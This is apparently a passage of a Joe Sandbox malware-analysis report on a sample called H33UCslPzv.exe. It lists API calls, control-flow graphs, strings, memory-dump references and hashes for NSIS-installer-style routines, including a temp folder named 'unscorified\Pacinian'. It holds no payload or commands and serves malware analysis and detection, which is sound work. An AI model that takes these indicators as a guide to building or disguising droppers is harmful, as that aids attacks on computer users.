                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll
                                                                  • API String ID: 2531174081-2952521951
                                                                  • Opcode ID: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
                                                                  • Instruction ID: bffe320471bb4ed621b5b80758aa42b14eae6e2fc0b22327473978c148379bdd
                                                                  • Opcode Fuzzy Hash: 9951a7e7ddd9ebe88044292c7a15ece840a8b03f7fb7a7f461844e108945fb03
                                                                  • Instruction Fuzzy Hash: 06219D71D00518BBDF119FA9CD80ADEBFB9EF05358F10807AF904B6291C6388E418FA8

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 643 402ffb-40300f 644 403011 643->644 645 403018-403021 643->645 644->645 646 403023 645->646 647 40302a-40302f 645->647 646->647 648 403031-40303a call 403200 647->648 649 40303f-40304c call 4031ea 647->649 648->649 653 403052-403056 649->653 654 4031d8 649->654 655 403183-403185 653->655 656 40305c-403082 GetTickCount 653->656 657 4031da-4031db 654->657 661 4031c5-4031c8 655->661 662 403187-40318a 655->662 658 4031e0 656->658 659 403088-403090 656->659 660 4031e3-4031e7 657->660 658->660 663 403092 659->663 664 403095-4030a3 call 4031ea 659->664 665 4031ca 661->665 666 4031cd-4031d6 call 4031ea 661->666 662->658 667 40318c 662->667 663->664 664->654 676 4030a9-4030b2 664->676 665->666 666->654 677 4031dd 666->677 670 40318f-403195 667->670 671 403197 670->671 672 403199-4031a7 call 4031ea 670->672 671->672 672->654 680 4031a9-4031ae call 405c2d 672->680 679 4030b8-4030d8 call 4064aa 676->679 677->658 685 40317b-40317d 679->685 686 4030de-4030f1 GetTickCount 679->686 684 4031b3-4031b5 680->684 687 4031b7-4031c1 684->687 688 40317f-403181 684->688 685->657 689 4030f3-4030fb 686->689 690 403136-403138 686->690 687->670 693 4031c3 687->693 688->657 694 403103-40312e MulDiv wsprintfA call 405114 689->694 695 4030fd-403101 689->695 691 40313a-40313e 690->691 692 40316f-403173 690->692 696 403140-403147 call 405c2d 691->696 697 403155-403160 691->697 692->659 698 403179 692->698 693->658 702 403133 694->702 695->690 695->694 703 40314c-40314e 696->703 701 403163-403167 697->701 698->658 701->679 704 40316d 701->704 702->690 703->688 705 403150-403153 703->705 704->658 705->701
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$wsprintf
                                                                  • String ID: ... %d%%$s=y
                                                                  • API String ID: 551687249-665027819
                                                                  • Opcode ID: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
                                                                  • Instruction ID: 7192b2bd781d1e73c4002c8dab31bcfd9076020614228c7b813c8c88a4a42f55
                                                                  • Opcode Fuzzy Hash: 531ab917d645672a2734b3f0630f897d8eddb27c81774d971505de7d935cfd45
                                                                  • Instruction Fuzzy Hash: 63517931901209ABCB10DF65DA44A9F7BBCEF18766F14413BE810BB2D0C7799B41CBA9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 706 4055da-405625 CreateDirectoryA 707 405627-405629 706->707 708 40562b-405638 GetLastError 706->708 709 405652-405654 707->709 708->709 710 40563a-40564e SetFileSecurityA 708->710 710->707 711 405650 GetLastError 710->711 711->709
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D
                                                                  • GetLastError.KERNEL32 ref: 00405631
                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
                                                                  • GetLastError.KERNEL32 ref: 00405650
                                                                  Strings
                                                                  • C:\Users\user\Desktop, xrefs: 004055DA
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405600
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-1729097607
                                                                  • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                  • Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
                                                                  • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                  • Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 712 406317-406337 GetSystemDirectoryA 713 406339 712->713 714 40633b-40633d 712->714 713->714 715 40634d-40634f 714->715 716 40633f-406347 714->716 718 406350-406382 wsprintfA LoadLibraryExA 715->718 716->715 717 406349-40634b 716->717 717->718
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040632E
                                                                  • wsprintfA.USER32 ref: 00406367
                                                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040637B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%s.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-4240819195
                                                                  • Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                  • Instruction ID: 3c3b4468b6e1923fcac8586f88cca04ee8b9faba7420f287fa6fd57e775497b1
                                                                  • Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
                                                                  • Instruction Fuzzy Hash: B2F0FC70500609ABDB14ABA4DD0DFEB765CAB08304F14057AA987E10C1D678E4358B98

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 719 40206a-402076 720 402131-402133 719->720 721 40207c-402092 call 402b2c * 2 719->721 722 4022a4-4022a9 call 401423 720->722 730 4020a1-4020af LoadLibraryExA 721->730 731 402094-40209f GetModuleHandleA 721->731 728 4029b8-4029c7 722->728 733 4020b1-4020be GetProcAddress 730->733 734 40212a-40212c 730->734 731->730 731->733 736 4020c0-4020c6 733->736 737 4020fd-402102 call 405114 733->737 734->722 738 4020c8-4020d4 call 401423 736->738 739 4020df-4020f6 call 700216db 736->739 742 402107-40210a 737->742 738->742 750 4020d6-4020dd 738->750 745 4020f8-4020fb 739->745 742->728 743 402110-402118 call 4037aa 742->743 743->728 749 40211e-402125 FreeLibrary 743->749 745->742 749->728 750->742
                                                                  APIs
                                                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402095
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000,?), ref: 0040514D
                                                                    • Part of subcall function 00405114: lstrlenA.KERNEL32(00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0,?,?,?,?,?,?,?,?,?,00403133,00000000), ref: 0040515D
                                                                    • Part of subcall function 00405114: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00403133,00403133,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,00000000,00798F00,76F923A0), ref: 00405170
                                                                    • Part of subcall function 00405114: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405182
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                    • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020A5
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004020B5
                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040211F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                  • String ID: /z
                                                                  • API String ID: 2987980305-1190999251
                                                                  • Opcode ID: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
                                                                  • Instruction ID: e61536644f3bf68f7d9d9aba667bc4080f9c9cd2ba15b67bd91c869db9746c0c
                                                                  • Opcode Fuzzy Hash: 552394a17ba07369f051b22535714e48d013b44a7071bd44497ac4ed692714f9
                                                                  • Instruction Fuzzy Hash: 6521C671900214ABCF11BFA4CF89AAE7AB4AF45318F20413BF601B62D1D6FD4982965E

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 752 405bb5-405bbf 753 405bc0-405beb GetTickCount GetTempFileNameA 752->753 754 405bfa-405bfc 753->754 755 405bed-405bef 753->755 756 405bf4-405bf7 754->756 755->753 757 405bf1 755->757 757->756
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405BC9
                                                                  • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BB8
                                                                  • nsa, xrefs: 00405BC0
                                                                  • "C:\Users\user\Desktop\H33UCslPzv.exe", xrefs: 00405BB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\H33UCslPzv.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-2915536943
                                                                  • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                  • Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
                                                                  • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                  • Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 758 700216db-70021717 call 70021a98 762 70021834-70021836 758->762 763 7002171d-70021721 758->763 764 70021723-70021729 call 700222af 763->764 765 7002172a-70021737 call 700222f1 763->765 764->765 770 70021767-7002176e 765->770 771 70021739-7002173e 765->771 772 70021770-7002178c call 700224d8 call 70021559 call 70021266 GlobalFree 770->772 773 7002178e-70021792 770->773 774 70021740-70021741 771->774 775 70021759-7002175c 771->775 795 700217e3-700217e7 772->795 779 70021794-700217da call 7002156b call 700224d8 773->779 780 700217dc-700217e2 call 700224d8 773->780 777 70021743-70021744 774->777 778 70021749-7002174a call 70022a38 774->778 775->770 781 7002175e-7002175f call 70022cc3 775->781 783 70021751-70021757 call 700226b2 777->783 784 70021746-70021747 777->784 790 7002174f 778->790 779->795 780->795 793 70021764 781->793 799 70021766 783->799 784->770 784->778 790->793 793->799 800 70021824-7002182b 795->800 801 700217e9-700217f7 call 7002249e 795->801 799->770 800->762 806 7002182d-7002182e GlobalFree 800->806 808 700217f9-700217fc 801->808 809 7002180f-70021816 801->809 806->762 808->809 810 700217fe-70021806 808->810 809->800 811 70021818-70021823 call 700214e2 809->811 810->809 812 70021808-70021809 FreeLibrary 810->812 811->800 812->809
                                                                  APIs
                                                                    • Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D09
                                                                    • Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D0E
                                                                    • Part of subcall function 70021A98: GlobalFree.KERNEL32(?), ref: 70021D13
                                                                  • GlobalFree.KERNEL32(00000000), ref: 70021786
                                                                  • FreeLibrary.KERNEL32(?), ref: 70021809
                                                                  • GlobalFree.KERNEL32(00000000), ref: 7002182E
                                                                    • Part of subcall function 700222AF: GlobalAlloc.KERNEL32(00000040,?), ref: 700222E0
                                                                    • Part of subcall function 700226B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70021757,00000000), ref: 70022782
                                                                    • Part of subcall function 7002156B: wsprintfA.USER32 ref: 70021599
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                                  • String ID:
                                                                  • API String ID: 3962662361-3916222277
                                                                  • Opcode ID: c0e49ddc98c45a6c5974f287828ed1a120217fa92ce1a545e1462e3c8aadc18b
                                                                  • Instruction ID: d26e5cec9199b6e92e57e19f15da0513dfe9973c9afe60b1a37dcf125d06428f
                                                                  • Opcode Fuzzy Hash: c0e49ddc98c45a6c5974f287828ed1a120217fa92ce1a545e1462e3c8aadc18b
                                                                  • Instruction Fuzzy Hash: 4B41B172104204AEDB01AF74EDC5BDE37FDBB54A32F248069F9069A297DF749485CBA0
                                                                  APIs
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,?,00405A8A,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,C:\Users\user\AppData\Local\Temp\nsj6A14.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,004057D5,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A2C
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A31
                                                                    • Part of subcall function 00405A1E: CharNextA.USER32(00000000), ref: 00405A45
                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                    • Part of subcall function 004055DA: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D
                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\unscorified\Pacinian,00000000,00000000,000000F0), ref: 0040163C
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\unscorified\Pacinian, xrefs: 00401631
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\unscorified\Pacinian
                                                                  • API String ID: 1892508949-1480192069
                                                                  • Opcode ID: 04e6969c0dcd3601385fd0e2838c4dafd03fce5596fd6c1ac1cfe2f5b2968c32
                                                                  • Instruction ID: afd89d35c011052612b9933dc16c135e328f8afd03e06d15a27ba8224079e4e0
                                                                  • Opcode Fuzzy Hash: 04e6969c0dcd3601385fd0e2838c4dafd03fce5596fd6c1ac1cfe2f5b2968c32
                                                                  • Instruction Fuzzy Hash: AC112731508141EBDB217FB54D4197F36B49E96324F28453FE4D1B22E2DA3D4842AA2E
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000002,Call,?,00406118,80000002), ref: 00405F1A
                                                                  • RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll), ref: 00405F25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CloseQueryValue
                                                                  • String ID: Call
                                                                  • API String ID: 3356406503-1824292864
                                                                  • Opcode ID: 1030a17f86b53444e8a5a3b6bccfdd0324da9206876f6c82357e637410bb066d
